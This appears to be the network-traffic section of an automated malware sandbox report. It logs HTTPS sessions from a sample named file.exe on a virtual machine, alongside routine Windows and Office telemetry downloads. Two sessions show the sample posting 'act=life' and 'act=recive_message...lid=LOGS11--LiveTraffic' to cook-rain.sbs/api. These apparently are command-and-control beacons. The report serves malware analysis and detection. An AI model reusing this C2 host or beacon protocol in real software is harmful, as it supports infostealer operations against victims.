                                                                                                                                                                        x-ms-request-id: dc5d8209-b01e-003e-6698-3b8e41000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093720Z-r1d97b9957789nh9hC1TEBxha80000000abg000000003xu1
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        8192.168.2.64971940.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:20 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 75 33 6c 47 4b 42 68 47 6b 47 74 65 53 34 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 39 63 34 62 34 32 32 63 32 31 64 64 38 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: Yu3lGKBhGkGteS4R.1Context: a6e9c4b422c21dd8
                                                                                                                                                                        2024-11-21 09:37:20 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:20 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 59 75 33 6c 47 4b 42 68 47 6b 47 74 65 53 34 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 39 63 34 62 34 32 32 63 32 31 64 64 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Yu3lGKBhGkGteS4R.2Context: a6e9c4b422c21dd8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                                                                                                                                        2024-11-21 09:37:20 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 75 33 6c 47 4b 42 68 47 6b 47 74 65 53 34 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 39 63 34 62 34 32 32 63 32 31 64 64 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: Yu3lGKBhGkGteS4R.3Context: a6e9c4b422c21dd8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                        2024-11-21 09:37:21 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:21 UTC58INData Raw: 4d 53 2d 43 56 3a 20 73 4c 69 37 52 77 64 36 73 55 43 69 4f 30 38 79 4c 52 59 55 68 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: sLi7Rwd6sUCiO08yLRYUhA.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.649720188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:20 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-11-21 09:37:21 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:21 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=cpaodkfahogovl0jg0u8dbtubs; expires=Mon, 17-Mar-2025 03:24:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSHoNkx%2F8lw7LurxYx5sFB6HYjUs2ye9olEhNeQSJN7mBpvnassF7Dnd87eqadBuqMqQR88S703msJYUkhuIL4%2BbI31%2Blhm%2BvqsKunPt5y7E98bp0bKcEeCdNSWu6n1i"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb35a8f953320-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2030&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=904&delivery_rate=1424390&cwnd=252&unsent_bytes=0&cid=d55c6c7b6d0fd870&ts=708&x=0"
                                                                                                                                                                        2024-11-21 09:37:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-11-21 09:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        10192.168.2.64972213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                        x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093722Z-r1d97b99577sdxndhC1TEBec5n0000000aa0000000006x0m
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:22 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        11192.168.2.64972513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                        x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093722Z-1777c6cb7542p5p4hC1TEBq0980000000b00000000000tbh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        12192.168.2.64972113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                        x-ms-request-id: a3d07856-b01e-0084-3a7e-3bd736000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093722Z-1777c6cb754lvj6mhC1TEBke940000000avg00000000gse0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:22 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        13192.168.2.64972413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                        x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093722Z-1777c6cb754whff4hC1TEBcd6c00000009eg00000000ezn1
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:22 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        14192.168.2.64972313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:22 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                        x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093722Z-1777c6cb7542p5p4hC1TEBq0980000000atg00000000ez9s
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        15192.168.2.649726188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:22 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:22 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                        2024-11-21 09:37:23 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:23 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=hi7b6dsno2du86a34h3iqmetjc; expires=Mon, 17-Mar-2025 03:24:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIVMpDkaZtd4qROMGdsKdoxZKZKX7ud008GFjJWkA1hSp%2Ffm4b5WhSF7FE41D%2BNydrWmgRKuniK2EnRORSkwwQmecJxw3ZpmKqnsKvSm81Ub9mO3LmhdC9UEcKBsQONx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb3674ae842f1-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=950&delivery_rate=1798029&cwnd=195&unsent_bytes=0&cid=c0fba1511556b140&ts=698&x=0"
